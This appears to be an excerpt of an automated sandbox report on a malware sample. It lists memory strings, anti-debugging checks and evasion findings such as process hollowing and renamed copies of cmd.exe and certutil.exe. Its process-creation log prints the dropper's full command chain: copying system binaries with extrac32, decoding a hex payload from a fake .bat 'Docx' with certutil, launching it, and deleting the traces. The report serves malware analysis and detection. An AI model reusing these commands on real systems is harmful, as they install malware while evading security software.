              Source: xzeheenC.pif, 0000001A.00000002.2757842807.0000000022863000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd201d8285f219
              Source: xzeheenC.pif, 0000001A.00000002.2757842807.0000000022B88000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd210b4912642d<
              Source: xzeheenC.pif, 0000001A.00000002.2757842807.0000000022B88000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd221edce7d449<
              Source: xzeheenC.pif, 0000001A.00000002.2757842807.0000000022B88000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd22be5581407d<
              Source: xzeheenC.pif, 00000010.00000002.2757407434.000000002B7A4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd20cec9e96ae0<
              Source: xzeheenC.pif, 00000016.00000002.2758412799.0000000032C31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd222ae7dea767
              Source: xzeheenC.pif, 0000001A.00000002.2757842807.0000000022B88000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd21254f48c305<
              Source: xzeheenC.pif, 00000010.00000002.2757407434.000000002B68C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd1fbdeca09ef1<
              Source: xzeheenC.pif, 0000001A.00000002.2757842807.0000000022B88000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd20c87699746c<
              Source: xzeheenC.pif, 0000001A.00000002.2757842807.000000002293F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd205b7d4f4ac3h
              Source: spoolsv.COM, 0000000A.00000002.1583110687.00000000007B7000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1583110687.000000000076F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: xzeheenC.pif, 00000010.00000002.2757407434.000000002BA5F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd24077f7c4b2d<
              Source: xzeheenC.pif, 0000001A.00000002.2757842807.0000000022A51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd1faabcbe3ba4<
              Source: xzeheenC.pif, 0000001A.00000002.2757842807.000000002293F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd2070e745a6df
              Source: xzeheenC.pif, 00000010.00000002.2757407434.000000002B7A4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd2068b658623b<
              Source: xzeheenC.pif, 0000001A.00000002.2757842807.0000000022A51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd1fec91a656cd<
              Source: xzeheenC.pif, 00000016.00000002.2758412799.0000000032C31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd2370c4ba52f1
              Source: xzeheenC.pif, 0000001A.00000002.2757842807.000000002293F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd209cd6857f2c
              Source: xzeheenC.pif, 0000001A.00000002.2757842807.0000000022B88000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd20b3594cb916<
              Source: xzeheenC.pif, 00000010.00000002.2757407434.000000002B7FD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd20e3c6ae2bb6<
              Source: xzeheenC.pif, 00000016.00000002.2758412799.0000000032C31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd21b2badf5d23
              Source: xzeheenC.pif, 00000010.00000002.2757407434.000000002B68C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd1fd27f95701a<
              Source: xzeheenC.pif, 0000001A.00000002.2757842807.00000000229BE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd23336ff9d791<
              Source: xzeheenC.pif, 0000001A.00000002.2757842807.000000002293F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd20b3594cb916ERh
              Source: xzeheenC.pif, 00000010.00000002.2757407434.000000002BA5F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd2565e5b25501<
              Source: xzeheenC.pif, 00000016.00000002.2758412799.0000000032AEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd1f66d44105a7
              Source: xzeheenC.pif, 00000016.00000002.2758412799.0000000032C31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd2150839db402
              Source: xzeheenC.pif, 0000001A.00000002.2757842807.000000002293F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd20dd81284159h
              Source: xzeheenC.pif, 00000010.00000002.2757407434.000000002B62B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd1f640271612d<
              Source: xzeheenC.pif, 00000010.00000002.2757407434.000000002B7FD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd21101d4364c8<
              Source: xzeheenC.pif, 00000010.00000002.2757407434.000000002B7FD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd223310119778<
              Source: xzeheenC.pif, 00000010.00000002.2757407434.000000002B7A4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd205347cb53af<
              Source: xzeheenC.pif, 00000010.00000002.2757407434.000000002B7A4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd2090b25629b5<
              Source: xzeheenC.pif, 0000001A.00000002.2757842807.000000002293F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd21b1a0691632h
              Source: xzeheenC.pif, 00000010.00000002.2757407434.000000002B8E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd231ab10327a5<
              Source: xzeheenC.pif, 0000001A.00000002.2757842807.0000000022B88000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd2044a7ee04b8<
              Source: Cneehezx.PIF, 00000012.00000002.1709829518.000000000054B000.00000004.00000020.00020000.00000000.sdmp, xzeheenC.pif, 0000001A.00000002.2755255782.000000002071C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll@
              Source: xzeheenC.pif, 0000001A.00000002.2757842807.0000000022A51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd2003b93d294e<
              Source: xzeheenC.pif, 00000010.00000002.2757407434.000000002B7FD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd2149110694f3<
              Source: xzeheenC.pif, 00000016.00000002.2758412799.0000000032D67000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd23bc8169851c<
              Source: xzeheenC.pif, 00000016.00000002.2758412799.0000000032C31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd218eab45cc14
              Source: xzeheenC.pif, 0000001A.00000002.2757842807.0000000022B88000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd227d39ecb039<
              Source: xzeheenC.pif, 00000016.00000002.2758412799.0000000032ED4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd24f586dd246f<
              Source: xzeheenC.pif, 0000001A.00000002.2757842807.0000000022863000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd1faabcbe3ba4
              Source: xzeheenC.pif, 0000001A.00000002.2757842807.000000002293F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd2044a7ee04b8
              Source: xzeheenC.pif, 00000016.00000002.2758412799.0000000032ED4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd253f1bc168da<
              Source: xzeheenC.pif, 00000010.00000002.2757407434.000000002B68C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd2013e4ac1c7c<
              Source: xzeheenC.pif, 00000016.00000002.2758412799.0000000032C31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd22de9ba98f31
              Source: xzeheenC.pif, 0000001A.00000002.2757842807.000000002293F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd20f3c83870c3
              Source: xzeheenC.pif, 00000010.00000002.2757407434.000000002B68C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd1f7a41c14c84<
              Source: xzeheenC.pif, 0000001A.00000002.2757842807.0000000022B88000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd208793074bc2<
              Source: xzeheenC.pif, 00000010.00000002.2757407434.000000002BA5F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd23af6eeb12b8<
              Source: xzeheenC.pif, 00000016.00000002.2758412799.0000000032C31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd20718558b20c
              Source: xzeheenC.pif, 0000001A.00000002.2757842807.0000000022B88000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd209cd6857f2c<
              Source: xzeheenC.pif, 0000001A.00000002.2757842807.000000002293F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd21d54c9e0a5c
              Source: xzeheenC.pif, 00000010.00000002.2757407434.000000002BA5F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd246a28398923<
              Source: xzeheenC.pif, 0000001A.00000002.2757842807.0000000022863000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd1fd9705a96a3
              Source: xzeheenC.pif, 00000016.00000002.2758412799.0000000032B04000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd202e190e4b21
              Source: xzeheenC.pif, 00000010.00000002.2755700355.0000000029908000.00000004.00000020.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2756654724.0000000030A9D000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000017.00000002.1786215304.0000000000708000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: xzeheenC.pif, 0000001A.00000002.2757842807.00000000227D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd1f4f156a80ed
              Source: xzeheenC.pif, 00000016.00000002.2758412799.0000000032C31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd213292786ec5
              Source: xzeheenC.pif, 00000010.00000002.2757407434.000000002B68C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd20298b3b9c53<
              Source: xzeheenC.pif, 00000010.00000002.2757407434.000000002B68C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd1fe85eef5b42<
              Source: xzeheenC.pif, 00000010.00000002.2757407434.000000002B68C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd203dc62b7545<
              Source: xzeheenC.pif, 0000001A.00000002.2757842807.000000002293F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd22be5581407dh
              Source: xzeheenC.pif, 0000001A.00000002.2757842807.0000000022863000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd1fec91a656cd
              Source: xzeheenC.pif, 0000001A.00000002.2757842807.0000000022B88000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd215a5df1d419<
              Source: xzeheenC.pif, 0000001A.00000002.2757842807.0000000022863000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd1fc0c1b966bb
              Source: xzeheenC.pif, 00000016.00000002.2758412799.0000000032AEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd1f7fdbb5edd9
              Source: xzeheenC.pif, 00000010.00000002.2757407434.000000002B68C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd1fa7e7d3e4d6<
              Source: xzeheenC.pif, 00000016.00000002.2758412799.0000000032B04000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd1fb1ab45af37
              Source: spoolsv.COM, 0000000A.00000002.1614981491.000000007FBC0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 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
              Source: xzeheenC.pif, 00000016.00000002.2758412799.0000000032C31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd2059540f56aa
              Source: xzeheenC.pif, 0000001A.00000002.2757842807.000000002293F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd215a5df1d419
              Source: xzeheenC.pif, 00000016.00000002.2758412799.0000000032C31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd22799af3df8b
              Source: xzeheenC.pif, 00000016.00000002.2758412799.0000000032ED0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd245aeb8c82be<
              Source: xzeheenC.pif, 00000010.00000002.2757407434.000000002B7FD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd219ef909f384<
              Source: xzeheenC.pif, 0000001A.00000002.2757842807.000000002293F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd224ec822fa72
              Source: xzeheenC.pif, 00000010.00000002.2757407434.000000002BA5F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd24d2b90dc0e1<
              Source: C:\Users\Public\Libraries\spoolsv.COMAPI call chain: ExitProcess graph end node
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information queried: ProcessInformation

              Anti Debugging

              barindex
              Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
              Source: C:\Users\Public\Libraries\spoolsv.COMCode function: 10_2_0290EBF0 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,10_2_0290EBF0
              Source: C:\Users\Public\Libraries\spoolsv.COMProcess queried: DebugPortJump to behavior
              Source: C:\Users\Public\Libraries\Cneehezx.PIFProcess queried: DebugPort
              Source: C:\Users\Public\Libraries\Cneehezx.PIFProcess queried: DebugPort
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7AB1463FC GetCurrentThreadId,IsDebuggerPresent,OutputDebugStringW,4_2_00007FF7AB1463FC
              Source: C:\Users\Public\Libraries\spoolsv.COMCode function: 10_2_029087A0 LoadLibraryW,GetProcAddress,FreeLibrary,10_2_029087A0
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7AB13823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,4_2_00007FF7AB13823C
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess token adjusted: Debug
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7AB138FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00007FF7AB138FA4
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7AB1393B0 SetUnhandledExceptionFilter,4_2_00007FF7AB1393B0
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7AB138FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00007FF7AB138FA4
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7AB1393B0 SetUnhandledExceptionFilter,6_2_00007FF7AB1393B0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792E053E0 SetUnhandledExceptionFilter,7_2_00007FF792E053E0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792E04E18 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_00007FF792E04E18
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB138FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_00007FF7AB138FA4
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB1393B0 SetUnhandledExceptionFilter,11_2_00007FF7AB1393B0
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB138FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_00007FF7AB138FA4
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB1393B0 SetUnhandledExceptionFilter,12_2_00007FF7AB1393B0
              Source: C:\Users\Public\Libraries\xzeheenC.pifMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Allocates memory in foreign processes
              Source: C:\Users\Public\Libraries\spoolsv.COMMemory allocated: C:\Users\Public\Libraries\xzeheenC.pif base: 400000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\Public\Libraries\Cneehezx.PIFMemory allocated: C:\Users\Public\Libraries\xzeheenC.pif base: 400000 protect: page execute and read and write
              Source: C:\Users\Public\Libraries\Cneehezx.PIFMemory allocated: C:\Users\Public\Libraries\xzeheenC.pif base: 400000 protect: page execute and read and write
              Drops or copies certutil.exe with a different name (likely to bypass HIPS)
              Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\kn.exeJump to dropped file
              Drops or copies cmd.exe with a different name (likely to bypass HIPS)
              Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to dropped file
              Sample uses process hollowing technique
              Source: C:\Users\Public\Libraries\spoolsv.COMSection unmapped: C:\Users\Public\Libraries\xzeheenC.pif base address: 400000Jump to behavior
              Source: C:\Users\Public\Libraries\Cneehezx.PIFSection unmapped: C:\Users\Public\Libraries\xzeheenC.pif base address: 400000
              Source: C:\Users\Public\Libraries\Cneehezx.PIFSection unmapped: C:\Users\Public\Libraries\xzeheenC.pif base address: 400000
              Writes to foreign memory regions
              Source: C:\Users\Public\Libraries\spoolsv.COMMemory written: C:\Users\Public\Libraries\xzeheenC.pif base: 3B6008Jump to behavior
              Source: C:\Users\Public\Libraries\Cneehezx.PIFMemory written: C:\Users\Public\Libraries\xzeheenC.pif base: 3E5008
              Source: C:\Users\Public\Libraries\Cneehezx.PIFMemory written: C:\Users\Public\Libraries\xzeheenC.pif base: 330008
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DB7024 GetModuleHandleW,GetProcAddress,#356,#357,CloseHandle,LocalFree,LocalFree,LocalFree,ImpersonateLoggedOnUser,#356,EqualSid,#357,LogonUserExW,GetLastError,ImpersonateLoggedOnUser,#356,#359,RevertToSelf,#356,7_2_00007FF792DB7024
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exeJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\F.O Pump Istek,Docx.bat" "C:\\Users\\Public\\spoolsv.MPEG" 9 Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\spoolsv.MPEG" "C:\\Users\\Public\\Libraries\\spoolsv.COM" 12 Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\Libraries\spoolsv.COM C:\Users\Public\Libraries\spoolsv.COMJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\spoolsv.MPEG" / A / F / Q / S Jump to behavior
              Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exeJump to behavior
              Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\F.O Pump Istek,Docx.bat" "C:\\Users\\Public\\spoolsv.MPEG" 9 Jump to behavior
              Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\spoolsv.MPEG" "C:\\Users\\Public\\Libraries\\spoolsv.COM" 12 Jump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMProcess created: C:\Users\Public\Libraries\xzeheenC.pif C:\Users\Public\Libraries\xzeheenC.pifJump to behavior
              Source: C:\Users\Public\Libraries\Cneehezx.PIFProcess created: C:\Users\Public\Libraries\xzeheenC.pif C:\Users\Public\Libraries\xzeheenC.pif
              Source: C:\Users\Public\Libraries\Cneehezx.PIFProcess created: C:\Users\Public\Libraries\xzeheenC.pif C:\Users\Public\Libraries\xzeheenC.pif
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DE72B0 CAFindByName,#359,LocalAlloc,InitializeSecurityDescriptor,GetLastError,SetSecurityDescriptorDacl,GetLastError,GetSecurityDescriptorLength,LocalAlloc,MakeSelfRelativeSD,GetLastError,CASetCASecurity,CAUpdateCAEx,#357,LocalFree,LocalFree,LocalFree,CACloseCA,7_2_00007FF792DE72B0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DB4E98 AllocateAndInitializeSid,GetLastError,#357,GetCurrentThread,GetLastError,OpenThreadToken,GetLastError,GetCurrentProcess,GetLastError,OpenProcessToken,GetLastError,DuplicateToken,GetLastError,CheckTokenMembership,GetLastError,CloseHandle,CloseHandle,FreeSid,7_2_00007FF792DB4E98
